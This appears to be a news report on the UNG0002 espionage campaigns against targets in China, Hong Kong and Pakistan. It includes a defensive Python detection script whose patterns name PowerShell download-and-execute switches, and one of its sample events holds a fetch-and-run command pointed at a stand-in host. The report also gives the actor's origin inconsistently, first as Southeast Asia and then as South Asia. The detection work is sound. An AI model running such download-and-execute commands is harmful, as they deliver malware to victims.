
Many regions in China, Hong Kong and Pakistan have become the target of a threat activity cluster tracked as UNG0002 (aka Unknown Group 0002) as part of a broad cyber espionage campaign.
“This threat entity shows a strong preference for using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and Metasploit, while consistently deploying CV-themed decoy documents to entice victims,” Subhajit Singha, a researcher at Seqrite Labs, said in a report this week.
The activity comprises two major campaigns: Operation Cobalt Whisper, which ran between May and September 2024, and Operation AmberMist, which took place between January and May 2025.
The targets of these campaigns span the defense, electrotechnical engineering, energy, civil aviation, academic, medical, cyber security, gaming and software development sectors.
Operation Cobalt Whisper was first documented by Seqrite Labs at the end of October 2024. It relied on Cobalt Strike Beacons, a post-exploitation framework, distributed through ZIP archives delivered via spear-phishing attacks, with LNK files and Visual Basic Script serving as interim payloads.
The company said, “The scope and complexity of the campaign, combined with its consistency, strongly suggest an attempt by an APT group to compromise sensitive research and intellectual property in these industries.”
The AmberMist attack chain has been found to use spear-phishing emails as the initial entry point to distribute LNK files posing as CVs and resumes, which kick off a multi-stage infection process culminating in the deployment of INET RAT and the Blister DLL loader.
Alternate attack sequences observed in January 2025 have been found to serve fake CAPTCHA verification checks on the website of the Ministry of Maritime Affairs (MoMA) of Pakistan, which are used to trick the target into launching a PowerShell command.
Launched via DLL side-loading, the DLL is able to establish contact with a remote server and wait for further commands. INET RAT is assessed to be a modified version of Shadow RAT, while the Blister DLL implant acts as a shellcode loader, ultimately paving the way for a reverse-shell-based implant.
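As an added illustration (not code from the article or from Seqrite Labs), the following Python heuristics triage constructed process-creation and image-load events for the behaviours described above: a shortcut launching VBScript, the script stage handing off to PowerShell, a fake-CAPTCHA PowerShell launch, and a DLL side-loading candidate. All field names, paths, binaries and sample values are assumptions made for the example.

```python
# Added example, not code from the article or from Seqrite Labs: heuristic
# triage over constructed Sysmon-style events for the delivery chain described
# above. All field names, paths and binaries are assumptions.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SUSPICIOUS_PS = ("-enc", "-w hidden", "iex", "downloadstring", "invoke-expression")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

def triage(event: dict) -> list[str]:
    """Return the names of the heuristics an event trips (empty if none)."""
    hits = []
    if event["type"] == "process":
        parent = event["parent"].lower()
        image = event["image"].rsplit("\\", 1)[-1].lower()
        cmd = event["cmdline"].lower()
        # Shortcut opened from Explorer that starts a VBScript interpreter
        if parent == "explorer.exe" and image in SCRIPT_HOSTS and ".vbs" in cmd:
            hits.append("lnk_vbscript")
        # VBScript stage handing off to PowerShell to fetch the next payload
        if parent in SCRIPT_HOSTS and image in SHELLS:
            hits.append("vbscript_to_powershell")
        # Fake-CAPTCHA flow: PowerShell from a browser/Explorer with download/eval switches
        if image in SHELLS and parent in LAUNCHERS and any(s in cmd for s in SUSPICIOUS_PS):
            hits.append("fake_captcha_powershell")
    elif event["type"] == "imageload":
        proc, dll = event["image"].lower(), event["loaded"].lower()
        same_dir = proc.rsplit("\\", 1)[0] == dll.rsplit("\\", 1)[0]
        # Side-loading candidate: process in a user-writable folder loads an unsigned DLL beside it
        if proc.startswith(USER_WRITABLE) and same_dir and not event.get("signed", False):
            hits.append("dll_sideload_candidate")
    return hits

def triage_all(events: list[dict]) -> dict[int, list[str]]:
    """Map event index to the heuristics it tripped, skipping clean events."""
    return {i: h for i, e in enumerate(events) if (h := triage(e))}

# Constructed sample events (not real telemetry or indicators)
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\v\\Downloads\\resume.vbs"'},
    {"type": "process", "parent": "wscript.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -enc AAAA"},
    {"type": "process", "parent": "msedge.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden iex (irm hxxp://example.invalid/verify)"},
    {"type": "imageload", "image": "C:\\Users\\v\\AppData\\Local\\Temp\\viewer.exe",
     "loaded": "C:\\Users\\v\\AppData\\Local\\Temp\\helper.dll", "signed": False},
]
```

Each heuristic on its own is noisy in a real environment; the value is in correlating them along the same host and time window, which is what the chain described above looks like in telemetry.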
The exact origin of the actor is unclear, but the evidence points to an espionage-focused group from Southeast Asia.
“UNG0002 represents a sophisticated and persistent threat entity from South Asia that has maintained frequent operations targeting several Asian countries since at least May 2024,” Singha said. “The group displays high adaptability and technical proficiency, constantly developing its toolsets while maintaining its tactics, techniques and procedures.”